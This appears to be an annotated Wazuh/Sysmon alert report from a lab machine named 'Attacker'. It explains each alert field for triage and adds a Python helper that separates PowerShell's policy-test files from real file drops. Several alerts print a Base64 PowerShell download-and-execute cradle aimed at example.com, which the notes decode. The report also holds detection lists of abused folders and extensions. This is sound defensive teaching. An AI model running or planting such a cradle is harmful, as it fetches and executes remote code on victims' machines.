rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  78
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534320.1687109
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon's own event numbering applies (1 = ProcessCreate, 11 = FileCreate), not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID – confirms the source even when the name field is missing.

data.win.system.eventID:  11
Event ID within this provider's numbering. Sysmon 11 = FileCreate (1 = ProcessCreate, 3 = NetworkConnect). The 4624/4688‑style IDs belong to the Security log, a different provider – don't mix the two tables.

data.win.system.version:  2
Schema version of this event type's template; Sysmon bumps it when it adds fields. Only matters to parsers.

data.win.system.level:  4
Windows event level: 1 critical, 2 error, 3 warning, 4 information, 5 verbose. Sysmon writes everything at 4, so it says nothing about how bad the event is – use rule.level.

data.win.system.task:  11
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:38.4764370Z
When the event was written to the Windows event log (UTC, 100‑ns ticks). Compare with eventdata.utcTime (when it happened) and timestamp (when Wazuh processed it) to measure collection lag.

data.win.system.eventRecordID:  284721
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry – the Sysmon service itself, not the process being reported. The reported process is in eventdata.processId.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the entry. Constant across these alerts; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Microsoft-Windows-Sysmon/Operational is the Sysmon log – query it with Get-WinEvent or wevtutil around this eventRecordID to see the neighbouring records.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:38.465 ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} ProcessId: 14508 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1 CreationUtcTime: 2025-04-24 22:38:38.465 User: Attacker\Attcker1"
Rendered FileCreate message: Image is the writing process, TargetFilename the dropped file, ProcessGuid the join key to the matching EID 1. Here powershell.exe wrote __PSScriptPolicyTest_<random>.ps1 into the user's Temp – PowerShell creates this file on every start to test whether AppLocker/WDAC script enforcement is active, so the file itself is expected noise; the process that wrote it is what needs looking at.

data.win.eventdata.utcTime:  2025-04-24 22:38:38.465
When the file write happened on the endpoint (UTC, ms). Use this, not systemTime or timestamp, for the timeline.

data.win.eventdata.processGuid:  {94294ddc-bd6c-680a-7e0b-000000000e00}
Sysmon's never‑reused process ID. Join on it: the EID 1 with this ProcessGuid holds the command line of the PowerShell that wrote the file, and the next alert's ParentProcessGuid points back to it.

data.win.eventdata.processId:  14508
PID of the writing process. PIDs are recycled – correlate on processGuid, use the PID only to inspect the live process.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that created the file. A legitimate powershell.exe here; what matters is the command line it was started with.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1
Path of the file that was created. The rule fired on a .ps1 landing in Temp; the __PSScriptPolicyTest_ prefix identifies PowerShell's own start‑up AppLocker/WDAC test file, written on every launch.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:38.465
Creation timestamp on the file as the filesystem reports it. Equal to utcTime for a fresh file; earlier than utcTime means an existing file was overwritten or its timestamp back‑dated (Sysmon EID 2 covers timestomping).

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user the writing process runs as. A local account on the Attacker host here (machine name doubles as the domain).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:43.514+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:43.514+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  75
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534323.1689878
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon's own event numbering applies (1 = ProcessCreate, 11 = FileCreate), not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID – confirms the source even when the name field is missing.

data.win.system.eventID:  1
Event ID within this provider's numbering. Sysmon 1 = ProcessCreate, the richest Sysmon record (image, command line, hashes, parent). Its Security‑log cousin is 4688, which is a different provider with a different ID table.

data.win.system.version:  5
Schema version of this event type's template; Sysmon bumps it when it adds fields. Only matters to parsers.

data.win.system.level:  4
Windows event level: 1 critical, 2 error, 3 warning, 4 information, 5 verbose. Sysmon writes everything at 4, so it says nothing about how bad the event is – use rule.level.

data.win.system.task:  1
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:40.8912001Z
When the event was written to the Windows event log (UTC, 100‑ns ticks). Compare with eventdata.utcTime (when it happened) and timestamp (when Wazuh processed it) to measure collection lag.

data.win.system.eventRecordID:  284776
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry – the Sysmon service itself, not the process being reported. The reported process is in eventdata.processId.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the entry. Constant across these alerts; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Microsoft-Windows-Sysmon/Operational is the Sysmon log – query it with Get-WinEvent or wevtutil around this eventRecordID to see the neighbouring records.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:39.577 ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} ProcessId: 6508 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} ParentProcessId: 14508 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered ProcessCreate message, the whole record in one string. powershell.exe (PID 14508) started powershell.exe (PID 6508) with -NoLogo -NoProfile -EncodedCommand; the Base64 is UTF‑16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test') – a download‑and‑execute cradle. ParentCommandLine is identical to CommandLine, so this is one hop in a chain of PowerShell processes re‑launching the same command.

data.win.eventdata.utcTime:  2025-04-24 22:38:39.577
When the process started on the endpoint (UTC, ms). The authoritative timeline value.

data.win.eventdata.processGuid:  {94294ddc-bd6f-680a-840b-000000000e00}
Sysmon's never‑reused ID for the new process. Search it as ProcessGuid in EID 11 (files written) and EID 3 (network connections), and as ParentProcessGuid in later EID 1s, to follow what it did next.

data.win.eventdata.processId:  6508
PID of the new process. Recycled after exit – join on processGuid, not PID.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Legitimate powershell.exe – the parent and command line, not the binary, make this suspicious.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the image. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line – consistent with an OS‑shipped binary rather than a dropped copy.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Attackers who rename binaries rarely rewrite it, so it helps unmask a renamed PowerShell.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same use as description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. Expected for a System32 binary; check the Authenticode signature separately if in doubt, EID 1 does not verify it.

data.win.eventdata.originalFileName:  PowerShell.EXE
OriginalFileName from the PE version resource. Compare with the image's on‑disk name – OriginalFileName PowerShell.EXE running under another name is a masquerading tell (T1036).

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process. Decode -EncodedCommand (Base64 of UTF‑16LE) before judging it: here it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), i.e. fetch remote code and run it in memory. -NoProfile and -NoLogo are standard in cradles to skip profile scripts and banner output. The powershell.exe path appears twice: once as argv[0] and once as the first argument handed to it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory at start – the user's profile root here.

data.win.eventdata.user:  Attacker\\Attcker1
Account the new process runs as.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon ID of the logon session. Identical across the PowerShell processes in these alerts, so they share one session; match it to Security 4624 to see how that session began.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (hex). Equals the Logon ID in Security events 4624/4672/4688 for the same session.

data.win.eventdata.terminalSessionId:  1
Windows session number: 0 = services/SYSTEM, 1 and up = interactive users (console or RDP). 1 here means a user is logged on interactively.

data.win.eventdata.integrityLevel:  Medium
Mandatory integrity level: Low, Medium (standard user), High (elevated admin) or System. Medium – the cradle is not running elevated.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash(es) of the image file, algorithms chosen in the Sysmon config (SHA256 here). Look it up against a known‑good inventory or VirusTotal; a Microsoft‑shipped powershell.exe should resolve to a known‑clean hash.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd6c-680a-7e0b-000000000e00}
Sysmon ID of the parent. Equals the processGuid of the parent's own EID 1 – here the powershell.exe (PID 14508) that wrote the policy‑test file in the preceding alert, giving a PowerShell → PowerShell chain.

data.win.eventdata.parentProcessId:  14508
PID of the parent. Cross‑check against parentProcessGuid before trusting it (PIDs recycle).

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. PowerShell spawning PowerShell with an encoded command is exactly what this rule keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Identical to commandLine – the same encoded cradle is being re‑launched hop after hop; rule.firedtimes counts the hops.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent runs as. Same as user – no privilege change across the hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:43.587+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:43.587+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  79
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534323.1697945
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon's own event numbering applies (1 = ProcessCreate, 11 = FileCreate), not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID – confirms the source even when the name field is missing.

data.win.system.eventID:  11
Event ID within this provider's numbering. Sysmon 11 = FileCreate (1 = ProcessCreate, 3 = NetworkConnect). The 4624/4688‑style IDs belong to the Security log, a different provider – don't mix the two tables.

data.win.system.version:  2
Schema version of this event type's template; Sysmon bumps it when it adds fields. Only matters to parsers.

data.win.system.level:  4
Windows event level: 1 critical, 2 error, 3 warning, 4 information, 5 verbose. Sysmon writes everything at 4, so it says nothing about how bad the event is – use rule.level.

data.win.system.task:  11
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:41.1587369Z
When the event was written to the Windows event log (UTC, 100‑ns ticks). Compare with eventdata.utcTime (when it happened) and timestamp (when Wazuh processed it) to measure collection lag.

data.win.system.eventRecordID:  284778
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry – the Sysmon service itself, not the process being reported. The reported process is in eventdata.processId.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the entry. Constant across these alerts; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Microsoft-Windows-Sysmon/Operational is the Sysmon log – query it with Get-WinEvent or wevtutil around this eventRecordID to see the neighbouring records.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:41.132 ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} ProcessId: 6508 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ue5td5oc.hr3.ps1 CreationUtcTime: 2025-04-24 22:38:41.132 User: Attacker\Attcker1"
Rendered FileCreate message: Image is the writing process, TargetFilename the dropped file, ProcessGuid the join key to the matching EID 1. Here the powershell.exe from the previous alert (PID 6508) wrote __PSScriptPolicyTest_<random>.ps1 into the user's Temp – PowerShell creates this file on every start to test whether AppLocker/WDAC script enforcement is active, so the file itself is expected noise; the encoded command that started the process is the real finding.

data.win.eventdata.utcTime:  2025-04-24 22:38:41.132
When the file write happened on the endpoint (UTC, ms). Use this, not systemTime or timestamp, for the timeline.

data.win.eventdata.processGuid:  {94294ddc-bd6f-680a-840b-000000000e00}
Sysmon's never‑reused process ID. Same ProcessGuid as the EID 1 in the previous alert, so this file write belongs to the PowerShell started with the encoded command there.

data.win.eventdata.processId:  6508
PID of the writing process. PIDs are recycled – correlate on processGuid, use the PID only to inspect the live process.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that created the file. A legitimate powershell.exe here; what matters is the command line it was started with.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ue5td5oc.hr3.ps1
Path of the file that was created. The rule fired on a .ps1 landing in Temp; the __PSScriptPolicyTest_ prefix identifies PowerShell's own start‑up AppLocker/WDAC test file, written on every launch with a fresh random 8.3 name.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:41.132
Creation timestamp on the file as the filesystem reports it. Equal to utcTime for a fresh file; earlier than utcTime means an existing file was overwritten or its timestamp back‑dated (Sysmon EID 2 covers timestomping).

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user the writing process runs as. A local account on the Attacker host here (machine name doubles as the domain).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
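Both "Executable file dropped in folder commonly used by malware" alerts above (rule 92213, Sysmon EID 11) fire on the same artifact: powershell.exe writing __PSScriptPolicyTest_<random>.ps1 into the user's Temp folder, which PowerShell does at every start to test AppLocker/WDAC script enforcement. The triage helper below is an added example, not part of this report and not Wazuh's rule logic; its extension and folder lists only approximate what such a rule keys on (an assumption), the first two sample inputs are the Image/TargetFilename pairs from the two alerts, and the remaining samples are constructed. It keeps the alert but separates the expected artifact from a genuine drop, and still flags the benign filename when something other than PowerShell writes it.

```python
import ntpath
import re

# Approximation (assumption, not Wazuh rule 92213's actual logic) of what a
# "script/executable dropped in a commonly abused folder" rule looks for.
SUSPICIOUS_EXT = {".exe", ".dll", ".scr", ".ps1", ".psm1", ".vbs", ".js",
                  ".bat", ".cmd", ".hta"}
ABUSED_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
               "\\programdata\\", "\\users\\public\\", "\\windows\\temp\\")

# PowerShell's start-up AppLocker/WDAC test file: fixed prefix plus an
# 8.3 random name (Path.GetRandomFileName), .ps1 or .psm1.
POLICY_TEST = re.compile(r"^__PSScriptPolicyTest_[a-z0-9]{8}\.[a-z0-9]{3}\.psm?1$", re.I)
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def triage_file_create(image, target_filename):
    """Classify a Sysmon EID 11 (FileCreate) from its Image and TargetFilename.

    Returns (would_fire, verdict, reason); verdict is 'no-match',
    'expected-artifact' or 'investigate'.
    """
    folder, name = ntpath.split(target_filename)
    ext = ntpath.splitext(name)[1].lower()
    in_abused_dir = any(d in (folder.lower() + "\\") for d in ABUSED_DIRS)
    if ext not in SUSPICIOUS_EXT or not in_abused_dir:
        return (False, "no-match", "extension or folder outside rule scope")

    writer = ntpath.basename(image).lower()
    if POLICY_TEST.match(name):
        if writer in POWERSHELL_HOSTS:
            # Benign by itself; the interesting record is the EID 1 with the
            # same ProcessGuid, which holds the command line that started it.
            return (True, "expected-artifact",
                    "PowerShell script-policy self-test file; pivot to EID 1 by ProcessGuid")
        # The benign name written by anything else deserves a look: a dropper
        # could pick it precisely because analysts are trained to ignore it.
        return (True, "investigate",
                f"policy-test filename written by {writer}, not PowerShell")
    return (True, "investigate", f"{ext} dropped in {folder} by {writer}")


# Sample inputs: the two FileCreate alerts above, then constructed cases.
SAMPLES = [
    (r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1"),
    (r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ue5td5oc.hr3.ps1"),
    (r"C:\Windows\System32\cmd.exe",                                   # constructed
     r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1"),
    (r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",    # constructed
     r"C:\Users\Attcker1\AppData\Local\Temp\update.exe"),
    (r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",    # constructed
     r"C:\Users\Attcker1\Documents\notes.txt"),
]

if __name__ == "__main__":
    for image, target in SAMPLES:
        fires, verdict, reason = triage_file_create(image, target)
        print(f"{'FIRE' if fires else '----'} {verdict:17} {reason}")
```

The verdict is deliberately not "suppress": the alert stays, but the analyst's time goes to the EID 1 record behind the same ProcessGuid rather than to the file.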

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:47.118+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:47.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  76
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534327.1700710
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means Sysmon's own event numbering applies (1 = ProcessCreate, 11 = FileCreate), not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID – confirms the source even when the name field is missing.

data.win.system.eventID:  1
Event ID within this provider's numbering. Sysmon 1 = ProcessCreate, the richest Sysmon record (image, command line, hashes, parent). Its Security‑log cousin is 4688, which is a different provider with a different ID table.

data.win.system.version:  5
Schema version of this event type's template; Sysmon bumps it when it adds fields. Only matters to parsers.

data.win.system.level:  4
